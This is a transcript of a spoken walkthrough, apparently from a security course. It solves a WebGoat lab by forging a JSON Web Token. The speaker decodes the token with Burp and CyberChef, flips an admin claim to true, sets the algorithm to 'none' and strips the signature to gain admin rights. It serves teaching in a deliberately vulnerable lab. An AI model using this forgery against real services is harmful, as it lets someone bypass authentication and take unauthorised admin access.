Hey everyone. Hopefully you had a chance to play with this and exploit this vulnerability based on the explanations on the first two pages of this. So I'm going to go through this step-by-step for those of you who weren't able to exploit this, and we'll talk about where the functionality and the weakness comes from. So just to get some traffic so we can look at it, I'm going to go ahead and try to vote as the guest user. Going to vote as the Tom user, and then maybe I'll do a delete as the Jerry user, and a vote and a delete as the Sylvester user. So you can see we're not admin in any of those and it's not letting us to go through this. Go to our Burp proxy, pick one of the posts. So in this case, I'm going to pick the reset because I want to go through the specific challenge of deleting something, and it looks like when I hit the delete, it sends a reset for me. So to solve this challenge, we need to send the reset. I'm going to send this to the repeater. So this is the individual post where it failed, and in the repeater, we can hit go, and see that only admins can do this. So I'm going to take the access token, and put it in our little staging area just so that we have something to work with. So this is our access token, and we know from the previous specification that it's separated by dots. So we're going to break that up into three parts. We know that the first part is our header, we know that the second part is our claim, and we know the third part is our signature. So I'll indent those in a little bit. So we want to understand what the header is, what the claim is, and what the signature is. So I'm going to take the header, just copy it, and there's a decoder built into burp. So I'm going to erase that, put that in its decoder. Now, if you don't have the second option here, all you do is you click decode as Base64 and you get your answer. So we know that decoded access token has a header of that algorithm, and let's see what the claim is. We copy the claim, paste it in here. You'll notice that the paste doesn't do a great job here because this null terminator is messing up the hash. Sometimes you can validate it using a different decoder. Let's see if that works, Base64, no, that doesn't work. So I'm going to use a different decoder, CyberChef is a great tool. You can just Google CyberChef, and it's the first link that comes up. I'm going to put my Base64 string in here and convert it from a Base64, and CyberChef did a better job decoding it. So I will paste that in here. Our claim is this. So it looks like we can probably just replace admin false with true, but we're not there yet, and we know that we can't decode the signature. It's going to be a signature. It's an encrypted blurb. So if I even try, comes up as gibberish, so I won't. So let's modify these things. I'm going to just copy and paste it for now. So we can probably just make this a true statement, and we can put this back through our decoder so we can essentially re-encode it. So I'll just paste this here and encode as Base64, and we get that. So here is admin is True re-encoded, so now we have this value. Then, we need to get a header. So the thought process here is, well, what other headers are possible? So to get that answer, we're going to go back to our WebGoat, and if you look here, there is a specification listed for the algorithms. Let's just open both those up, and let's see if there's anything interesting in any of them. So I don't see header algorithm parameters on page 10. I don't see anything interesting in there. So let's go in here and see if there is a better cryptographic algorithm management for keys. Let's see if there's anything interesting there. So what are all the possible keys that I can use? There's a lot of keys in here, there we go. So header parameters for values of JWS. So it looks like we are using the 512, the HS512, so this one, and it seems to be a pretty optimal key. So it doesn't feel like we can change it, but I wonder if we can use none. So let's go back to this header and modify that to none, and let's go ahead and get a encoded version of that, put it here. Finally, we know from the specification because they told us on Page 2 that the format as header.claim.signature. I'm going to paste that in there. For the header, I'm just going to copy this text and replace it with the header. The claim, I'm going to copy this text, put it here, and I don't have a signature, so I'm just going to leave it empty, but I'm going to leave a dot there just because that's part of the specification. So I'm going to leave it as is. I'm going to copy this new access token that I assemble, I'm going to go back here, go to my repeater. I'm going to replace this access token, leaving in place the semicolon there. I'm just going to hit Go. So last time we did this, we got False, hit Go, and we get True. So we were able to essentially tell the server that, we're not going to sign this next thing, and here's the access token that I'm going to send you.